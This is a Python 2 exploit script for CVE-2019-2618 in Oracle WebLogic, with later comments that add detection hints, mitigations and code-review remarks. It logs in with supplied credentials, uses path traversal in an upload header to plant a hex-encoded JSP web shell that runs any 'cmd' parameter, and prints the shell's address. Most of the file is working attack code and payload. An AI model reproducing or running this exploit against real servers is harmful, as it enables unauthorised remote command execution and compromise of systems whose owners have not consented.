﻿#coding=utf-8

import requests
import sys


# Start-up banner, written as a Python 2 print statement. It labels the issue
# as a WebLogic upload flaw that needs a username and password,
# CVE-2019-2618. Nothing in this statement touches the network.
print '''
========================================================================
   _______      ________    ___   ___  __  ___       ___   __ __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \     |__ \ / //_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | || | (_) |______ ) / /_ | | (_) |
 | |      \ \/ / |  __|______/ /| | | || |\__, |______/ / '_ \| |> _ < 
 | |____   \  /  | |____    / /_| |_| || |  / /      / /| (_) | | (_) |
  \_____|   \/   |______|  |____|\___/ |_| /_/      |____\___/|_|\___/ 
                                                                       
      Weblogic Upload Vuln(Need  username password)-CVE-2019-2618
                              By Jas502n     
========================================================================
'''


# Command-line handling: the script takes a base URL, a WebLogic username and
# a password. The request needs valid credentials, so default or weak
# deployment credentials are what leave a server exposed; rotating them and
# applying the vendor fix for CVE-2019-2618 are the relevant mitigations.
# url = "http://10.10.20.166:7001/"
# NOTE(review): this guard only rejects fewer than 3 argv entries, but
# sys.argv[3] is read below, so a call with two arguments raises IndexError
# instead of showing the usage text. The "USE:" line also omits the URL.
if len(sys.argv) < 3:
    # The "VER:" lines are the server versions the author lists for this issue.
    print '+-----------------------------------------------------------------------+'
    print '+ VER: Oracle WebLogic Server 10.3.6.0                                  +'
    print '+      Oracle WebLogic Server 12.1.3.0                                  +'
    print '+      Oracle WebLogic Server 12.2.1.3                                  +' 
    print '+ USE: python cve-2019-2618_exp.py <username> <password>                +'
    print '+ EXP: python cve-2019-2618.py http://1.1.1.1:7001 weblogic Oracle@123  +'
    print '+-----------------------------------------------------------------------+'
    sys.exit()
url =sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

# Path of the WebLogic deployment service endpoint, appended to the base URL
# exactly as given on the command line. For detection: POST requests to this
# path from hosts that are not part of the domain's own administration
# traffic deserve review in access logs, and the path can be blocked at a
# reverse proxy or firewall where external clients have no need for it.
url_dir = "/bea_wls_deployment_internal/DeploymentService"

vuln_url = url + url_dir

print "\n>>>usage: python CVE-2019-2618.py url username password\n"
print "\n>>>>The Vuln Url:\n" , vuln_url

# File name used for the uploaded part and in the address printed at the end.
shell = "shell.jsp"

# Hex-encoded JSP source, decoded with the Python 2-only str.decode("hex").
# The decoded page passes the value of its "cmd" request parameter to
# Runtime.exec() and prints the process output, i.e. it is a command web
# shell. A .jsp file that appears unexpectedly under a WebLogic internal
# application's war directory is therefore a strong indicator of compromise.
# NOTE(review): the name `file` shadows the Python 2 builtin of the same name.
file = '3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0d0a3c250d0a253e0d0a3c48544d4c3e3c424f44593e0d0a436f6d6d616e64732077697468204a53500d0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0d0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0d0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0d0a3c2f464f524d3e0d0a3c7072653e0d0a3c250d0a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0d0a202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0d0a2020202050726f6365737320703b0d0a20202020696620282053797374656d2e67657450726f706572747928226f732e6e616d6522292e746f4c6f7765724361736528292e696e6465784f66282277696e646f7773222920213d202d31297b0d0a202020202020202070203d2052756e74696d652e67657452756e74696d6528292e657865632822636d642e657865202f432022202b20726571756573742e676574506172616d657465722822636d642229293b0d0a202020207d0d0a20202020656c73657b0d0a202020202020202070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0d0a202020207d0d0a202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0d0a20202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0d0a2020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0d0a20202020537472696e672064697372203d206469732e726561644c696e6528293b0d0a202020207768696c652028206469737220213d206e756c6c2029207b0d0a202020206f75742e7072696e746c6e2864697372293b0d0a2020202064697372203d206469732e726561644c696e6528293b0d0a202020207d0d0a7d0d0a253e0d0a3c2f7072653e0d0a3c2f424f44593e3c2f48544d4c3e'.decode("hex")
# Address of a local intercepting proxy. It is defined here but never passed
# to the request made later in the script.
proxies = {"http":"http://127.0.0.1:8080"}
# Hand-assembled multipart/form-data body with a single part: its filename is
# `shell` and its content is the decoded JSP with one space on either side.
# The boundary string must match the one declared in the content-type header.
payload = "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"shell.jsp\"; filename=\"%s\"\r\nContent-Type: false\r\n\r\n %s \r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--" % (shell,file)
# Request headers sent to the deployment service. Points a defender can match
# on in proxy, WAF or access logs:
#   - username and password travel as plain request headers, so over http://
#     they are readable on the wire and can end up in proxy or debug logs;
#   - wl_request_type is "app_upload", which by its name selects the upload
#     operation;
#   - wl_upload_application_name contains "/../" segments, which steer the
#     write out of the upload area and into a deployed internal application's
#     war directory. A ".." sequence in this header is presumably absent from
#     legitimate deployment traffic; confirm against a baseline before
#     alerting on it.
headers = {
    'content-type': "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    # 'username': "weblogic",
    # 'password': "Oracle@123",
    "username":username,
    "password":password,
    'wl_request_type': "app_upload",
   #"wl_upload_application_name": "/../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war",
    'wl_upload_application_name': "/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war",
    'wl_upload_delta': "true",
    'archive': "true",
    'serverName': "Jas502n",
    'server_version': "10.3.6.0",
    'cache-control': "no-cache"
    }



# Send the upload as a single POST. No timeout is set, and the `proxies`
# mapping defined earlier is not passed to the call.
response = requests.request("POST", vuln_url, data=payload, headers=headers)


# The response body is printed as the upload directory. The status code is
# never checked and "Congratulations!!!!" is printed unconditionally, so this
# output alone does not show that a file was written. During incident
# response, confirm against the server's filesystem and access log instead.
print "\n>>>>File Upload Dir: \n " ,response.content.strip()
print "Congratulations!!!!"
print '\n>>>>Upload Shell Addresss: \n', url+ "bea_wls_internal/" + shell
